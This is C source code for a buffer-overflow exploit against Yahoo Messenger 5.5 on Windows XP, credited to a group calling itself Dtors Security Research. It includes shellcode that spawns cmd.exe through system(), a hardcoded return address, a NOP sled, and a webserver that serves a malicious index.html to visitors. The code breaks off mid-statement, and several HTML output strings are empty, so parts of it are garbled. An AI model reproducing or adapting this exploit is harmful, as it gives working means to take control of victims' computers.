/* * * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--- * * Dtors Security Research (DSR) * Code by: Rave * * The buffer looks like this * * |-<-<-<--| * * ^__________^ * * */ #include #include #include #include #include /* These are the usual header files */ #include #include #include #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing special here.. * the victim gets a cmd shell on his desktop :) lol ! \ */ unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" "\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system() "\xff\xd0"; // call system() static int port; void Usage(char *programName) { printf("\n\t\t---------------------------------------------------\n"); printf("\t\t\t\tDtors Security Research (DSR) \n"); printf("\t\t\t\tCode by: Rave\n"); printf("\t\t\t\tMail: rave@dtors.net\n"); printf("\t\t---------------------------------------------------\n\n"); /* Modify here to add your usage message when the program is * called without arguments */ printf("\t\t---------------------------------------------------\n\n"); fprintf(stdout,"\t\t-P local webserver server portnumber\n"); fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n"); printf("\t\t---------------------------------------------------\n\n"); } /* returns the index of the first argument that is not an option; i.e. does not start with a dash or a slash */ int HandleOptions(int argc,char *argv[]) { int i,firstnonoption=0; for (i=1; i< argc;i++) { if (argv[i][0] == '/' || argv[i][0] == '-') { switch (argv[i][1]) { /* An argument -? means help is requested */ case '?': Usage(argv[0]); break; case 'P': port=atoi(argv[i+1]);break; case 'H': if (!stricmp(argv[i]+1,"help")) { Usage(argv[0]); break; } /* If the option -h means anything else * in your application add code here * Note: this falls through to the default * to print an "unknow option" message */ /* add your option switches here */ default: fprintf(stderr,"unknown option %s\n",argv[i]); break; } } else { firstnonoption = i; break; } } return firstnonoption; } int main(int argc,char *argv[]) { FILE *fptr; unsigned char buffer[5000]; int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change) int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */ char sd[MAXDATASIZE]; /* sd will store send text */ struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ struct hostent *he; /* pointer for the host entry */ WSADATA wsdata; WSAStartup(0x0101,&wsdata); if (argc == 1) { /* If no arguments we call the Usage routine and exit */ Usage(argv[0]); return 1; } HandleOptions(argc,argv); fprintf(stdout,"Creating index.html: "); if ((fptr =fopen("index.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } // memseting the buffers for preperation memset(sd,0x00,MAXDATASIZE); memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); // whe place the a jmp ebp+0x3 instuction inside the buffer // to jump over the eip changing bytes at the en offset // // jmp 0x3 // |____________^ buffer[offset-4]=0xeb; buffer[offset-3]=0x03; memcpy(buffer+offset,sraddress,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // here whe make the index.html // whe open it again if some one connects to the exploiting server // and send it over to the victim. fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"Oohhh my god exploited\n"); fprintf(fptr,"",0x22,0x22); fprintf(fptr,""); fprintf(fptr,"", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"Dtors Security Research (DSR)\n"); fprintf(fptr,"

Yah000 Messager Version 5.5 exploit....

\n"); fprintf(fptr,"
");
fprintf(fptr,"